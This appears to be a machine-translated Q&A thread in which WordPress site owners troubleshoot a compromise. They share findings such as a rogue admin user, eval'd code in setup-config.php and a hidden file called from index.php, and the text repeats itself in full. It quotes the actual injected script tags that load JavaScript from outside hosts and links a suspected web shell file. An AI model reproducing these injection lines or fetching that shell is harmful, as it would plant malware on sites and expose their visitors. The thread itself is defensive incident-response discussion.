脚本被注入到我所有 wordpress 页面的顶部
Script being injected into the top of all my wordpress page
刚刚注意到我们的一个 Wordpress 网站上出现了广告。确定这些脚本被注入到每个页面的顶部:
<script language="javascript" type="text/javascript" src="http://www.mde86.org/jquery.min.Js"></script><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/18658151.js"></script>
查看所有文件和数据库数小时,无法弄清楚注入它的是什么或它是如何到达那里的。
到目前为止我们发现了什么:
- function.php 中处理 post 的一些随机行 /
得到。我们删除了那些,但这似乎并没有解决问题。
- 我们发现了一个明显没有人创建的 wordpress 用户。所以我们删除了它。
- 重置 wordpress 和 FTP 访问权限的所有密码
- 当我们在本地设置中加载网站副本时,它不会显示广告或加载脚本...几乎就像它可以检测/定位实时网站一样?
但我们仍然无法找到脚本被注入的位置或方式。
非常感谢任何帮助。
有人在这里遇到了类似的问题,但不幸的是删除了他们的 post 所以只剩下缓存:
http://webcache.googleusercontent.com/search?q=cache:US-HRpncY-QJ:whosebug.com/questions/33398784/script-being-injected-into-the-top-of-all-my-wordpress-page+&cd=1&hl=en&ct=clnk&gl=au
尽量缩小注入源。
- 一次禁用一个插件
- 切换到不同的主题
- 检查 .htaccess 文件
- 针对服务器生成的注入进行测试
- 针对浏览器生成的注入进行测试
几个小时前遇到过同样的问题。
最后在 root wordpress "index.php" 处找到第一行注入的脚本调用,该脚本在同一目录中调用一个文件,名称以 .xxxxx 开头,类似于 .htaccess,因此它在 TCMD 中是隐藏的。
清除行并删除文件,现在一切正常。
但是怎么有人能控制 index.pho 我不知道....
在过去 24 小时左右,我的一个客户也发生了同样的事情。
能分享一下你使用的插件和wordpress版本吗?
影响这个的文件是wp-admin/setup-config.php。它有 加密 bash 代码 。我还发现在 wp_users 中生成了两个管理员用户。我认为很明显这是一种自动攻击,但它非常复杂。
我通过 google 搜索在某个随机网站上找到了代码。您可以在这里查看它:http://tmp.mongit.com/tools/core.txt - 它似乎是一个 shell 文件,但在 websec 方面我不是很聪明。
在我客户的服务器上,我还在根 /tmp/ 文件夹 (cPanel) 中发现了垃圾,wp_redirect 以某种方式访问了该文件夹(在 pluggable.php 第 1196 行中引用)。这些文件以 JSON 格式保存一些 MySQL 信息和 WP 数据库查询。不太确定这些文件的存在方式和原因。
[29-Oct-2015 02:45:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/xxx/public_html/wp-admin/setup-config.php(514) : eval()'d code(1) : eval()'d code:2) in /home/xxx/public_html/wp-includes/pluggable.php on line 1196
刚刚注意到我们的一个 Wordpress 网站上出现了广告。确定这些脚本被注入到每个页面的顶部:
<script language="javascript" type="text/javascript" src="http://www.mde86.org/jquery.min.Js"></script><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/18658151.js"></script>
查看所有文件和数据库数小时,无法弄清楚注入它的是什么或它是如何到达那里的。
到目前为止我们发现了什么:
- function.php 中处理 post 的一些随机行 / 得到。我们删除了那些,但这似乎并没有解决问题。
- 我们发现了一个明显没有人创建的 wordpress 用户。所以我们删除了它。
- 重置 wordpress 和 FTP 访问权限的所有密码
- 当我们在本地设置中加载网站副本时,它不会显示广告或加载脚本...几乎就像它可以检测/定位实时网站一样?
但我们仍然无法找到脚本被注入的位置或方式。
非常感谢任何帮助。
有人在这里遇到了类似的问题,但不幸的是删除了他们的 post 所以只剩下缓存: http://webcache.googleusercontent.com/search?q=cache:US-HRpncY-QJ:whosebug.com/questions/33398784/script-being-injected-into-the-top-of-all-my-wordpress-page+&cd=1&hl=en&ct=clnk&gl=au
尽量缩小注入源。
- 一次禁用一个插件
- 切换到不同的主题
- 检查 .htaccess 文件
- 针对服务器生成的注入进行测试
- 针对浏览器生成的注入进行测试
几个小时前遇到过同样的问题。 最后在 root wordpress "index.php" 处找到第一行注入的脚本调用,该脚本在同一目录中调用一个文件,名称以 .xxxxx 开头,类似于 .htaccess,因此它在 TCMD 中是隐藏的。 清除行并删除文件,现在一切正常。 但是怎么有人能控制 index.pho 我不知道....
在过去 24 小时左右,我的一个客户也发生了同样的事情。
能分享一下你使用的插件和wordpress版本吗?
影响这个的文件是wp-admin/setup-config.php。它有 加密 bash 代码 。我还发现在 wp_users 中生成了两个管理员用户。我认为很明显这是一种自动攻击,但它非常复杂。
我通过 google 搜索在某个随机网站上找到了代码。您可以在这里查看它:http://tmp.mongit.com/tools/core.txt - 它似乎是一个 shell 文件,但在 websec 方面我不是很聪明。
在我客户的服务器上,我还在根 /tmp/ 文件夹 (cPanel) 中发现了垃圾,wp_redirect 以某种方式访问了该文件夹(在 pluggable.php 第 1196 行中引用)。这些文件以 JSON 格式保存一些 MySQL 信息和 WP 数据库查询。不太确定这些文件的存在方式和原因。
[29-Oct-2015 02:45:59 UTC] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/xxx/public_html/wp-admin/setup-config.php(514) : eval()'d code(1) : eval()'d code:2) in /home/xxx/public_html/wp-includes/pluggable.php on line 1196